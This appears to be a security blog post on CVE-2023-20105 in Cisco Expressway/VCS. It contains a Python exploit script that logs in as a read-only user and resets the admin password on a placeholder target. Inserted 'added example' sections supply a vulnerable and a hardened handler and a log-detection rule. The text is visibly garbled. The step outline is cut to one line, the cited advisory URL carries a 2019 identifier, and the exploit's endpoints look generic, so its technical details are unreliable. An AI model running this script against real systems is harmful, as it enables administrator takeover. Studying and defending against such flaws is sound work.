A recently discovered vulnerability (CVE-2023-20105) found within the change password functionality of Cisco Expressway Series and Cisco TelePresence Video Communication Server (VCS) allows an authenticated, remote attacker with Read-only credentials to potentially elevate their privileges to Administrator on an affected system. In this blog post, we'll explore the details of this vulnerability, how it can be exploited, and what potential consequences may arise from a successful exploit. Additionally, we'll provide code snippets and links to reference materials that will help you secure your systems against this threat.

Details of the Vulnerability (CVE-2023-20105)

This security vulnerability is related to incorrect handling of password change requests by the affected Cisco devices, namely the Expressway-C (Control) device and the Expressway-E (Edge) device. An attacker can potentially exploit this vulnerability by authenticating to the application with Read-only user access and then sending a carefully crafted request to the web-based management interface. If successful, the exploit allows the attacker to modify the passwords of any user within the system, including administrative users, and then impersonate that user.
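The advisory text above describes the bug as incorrect handling of the password-change request: the server checks the caller's own current password but not whether the caller is allowed to set a password for the account named in the request. The following is an added example, not Cisco's code and not derived from the affected product, that models that authorization gap in a minimal handler and shows the hardened form next to it. All names (User, change_password_vulnerable, change_password_hardened) are hypothetical.

```python
"""Added example (not Cisco code): a minimal password-change handler with the
authorization gap the advisory describes, beside the corrected version."""
import hashlib
import hmac
import os
from dataclasses import dataclass


@dataclass
class User:
    name: str
    role: str          # "readonly" or "admin" (hypothetical role model)
    salt: bytes
    pw_hash: bytes


class Forbidden(Exception):
    """Raised when a request fails authentication or authorization."""


def _hash(password: str, salt: bytes) -> bytes:
    # PBKDF2-HMAC-SHA256; iteration count kept modest so the example runs quickly.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 20_000)


def make_user(name: str, role: str, password: str) -> User:
    salt = os.urandom(16)
    return User(name, role, salt, _hash(password, salt))


def verify_password(user: User, password: str) -> bool:
    return hmac.compare_digest(_hash(password, user.salt), user.pw_hash)


def _set_password(user: User, new_password: str) -> None:
    user.salt = os.urandom(16)
    user.pw_hash = _hash(new_password, user.salt)


def change_password_vulnerable(users: dict, session_user: str, current_password: str,
                               new_password: str, target_username: str) -> str:
    """Authenticates the caller, then writes the new password to whatever
    account the request names. The caller's role and the identity of the
    target are never compared: this is the gap a read-only user can abuse."""
    actor = users[session_user]
    if not verify_password(actor, current_password):
        raise Forbidden("current password does not match")
    target = users[target_username]
    _set_password(target, new_password)
    return target.name


def change_password_hardened(users: dict, session_user: str, current_password: str,
                             new_password: str, target_username: str) -> str:
    """Same flow, with the missing authorization check: a non-admin may only
    change their own password, and the decision is taken from the server-side
    session, never from a field the client controls."""
    actor = users[session_user]
    if not verify_password(actor, current_password):
        raise Forbidden("current password does not match")
    if target_username != session_user and actor.role != "admin":
        raise Forbidden("only administrators may change another user's password")
    target = users[target_username]
    _set_password(target, new_password)
    return target.name


def build_demo_users() -> dict:
    # Constructed sample accounts for the example.
    return {
        "admin": make_user("admin", "admin", "admin-secret"),
        "readonlyuser": make_user("readonlyuser", "readonly", "readonlypassword"),
    }
```

The important design point is that both the role and the acting identity come from the session on the server; the only client-supplied inputs that matter are the current password (proving the caller is who the session says) and the target, which is then checked against that identity.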

Exploit Details

By exploiting this vulnerability, an attacker with Read-only access to the system can essentially gain administrative privileges, thereby compromising the security and integrity of the system. Here is a basic outline of the exploit steps:

Impersonate the targeted user with the new password to gain elevated privileges.

To illustrate how this exploit works, let's examine a simple code snippet that accomplishes these steps:

import requests

# Authenticating as a Read-only user (TARGET_CISCO_DEVICE is a placeholder hostname)
url = "https://TARGET_CISCO_DEVICE/login"
payload = {"username": "readonlyuser", "password": "readonlypassword"}
response = requests.post(url, data=payload)

# Crafting the malicious HTTP request targeting the web-based management interface
url = "https://TARGET_CISCO_DEVICE/change_password"
payload = {
    "current_password": "readonlypassword",
    "new_password": "newadminpassword",
    "target_username": "admin",
}
headers = {"Cookie": response.headers["Set-Cookie"]}

# Sending the malicious request with the new password
requests.post(url, data=payload, headers=headers)

In the code snippet above, we use Python to authenticate with the target Cisco device and then send the malicious request. After the password for the "admin" user has been changed, the attacker can now impersonate the "admin" user with the new password, essentially gaining administrative access to the system.

Original References

You can find detailed information about this vulnerability and its implications in the following resources:

1. Cisco Security Advisory: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190227-vcs-expressway-elevation
2. National Vulnerability Database (NVD): https://nvd.nist.gov/vuln/detail/CVE-2023-20105

Conclusion

The CVE-2023-20105 vulnerability in Cisco Expressway Series and Cisco TelePresence VCS change password functionality presents a significant risk for organizations utilizing these devices. As such, it is crucial for administrators to promptly apply any patches or updates provided by Cisco to mitigate this vulnerability. Additionally, administrators should continuously monitor user activity on these devices to detect and prevent potential exploitation attempts. By understanding the details of this vulnerability and taking proactive steps to safeguard your systems, you can help protect your organization against this threat.
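The conclusion recommends monitoring user activity for exploitation attempts. The signal to look for follows directly from the flaw: a password change where the account being changed is not the account performing the change, and the acting account is not an administrator. The following added example (not Cisco's code, and not Cisco's log format) runs that rule over a few constructed audit lines in a key=value layout chosen for the example; a real deployment would adapt the parser to the format the device actually emits.

```python
"""Added example: flag password changes that a non-admin account performs
against a different account, over constructed key=value audit lines."""
import re
from typing import Dict, List, Optional

# Constructed log format for this example (NOT the real Expressway/VCS format).
_LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+audit\s+(?P<kv>(?:\w+=\S+\s*)+)$"
)

SAMPLE_LOG = """\
2023-06-28T15:15:00Z audit user=admin role=admin event=password_change target=admin result=success src=10.0.0.2
2023-06-28T15:16:10Z audit user=readonlyuser role=readonly event=password_change target=readonlyuser result=success src=10.0.0.5
2023-06-28T15:17:42Z audit user=readonlyuser role=readonly event=password_change target=admin result=success src=10.0.0.5
2023-06-28T15:18:03Z audit user=admin role=admin event=password_change target=readonlyuser result=success src=10.0.0.2
2023-06-28T15:19:30Z audit user=readonlyuser role=readonly event=login result=success src=10.0.0.5
this line is not an audit record and is skipped
"""


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Turn one audit line into a dict of fields, or None if it does not match."""
    m = _LINE_RE.match(line.strip())
    if not m:
        return None
    fields = {"ts": m.group("ts")}
    for token in m.group("kv").split():
        key, _, value = token.partition("=")
        fields[key] = value
    return fields


def is_suspicious_password_change(rec: Dict[str, str]) -> bool:
    """A non-admin actor changing a password on an account other than its own."""
    if rec.get("event") != "password_change":
        return False
    actor = rec.get("user")
    target = rec.get("target")
    role = rec.get("role")
    return actor is not None and target is not None and actor != target and role != "admin"


def find_alerts(log_text: str) -> List[Dict[str, str]]:
    """Return the parsed records that match the detection rule, in log order."""
    alerts = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is not None and is_suspicious_password_change(rec):
            alerts.append(rec)
    return alerts


if __name__ == "__main__":
    for a in find_alerts(SAMPLE_LOG):
        print(f"{a['ts']} ALERT: {a['user']} ({a['role']}) changed password of {a['target']} from {a['src']}")
```

Only the third line trips the rule; the administrator's reset of another user and each account's change of its own password are expected behaviour. Whether the change "succeeded" is deliberately not part of the rule, since a failed attempt of this shape is still worth an alert.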

Timeline

Published on: 06/28/2023 15:15:00 UTC
Last modified on: 07/12/2023 16:15:00 UTC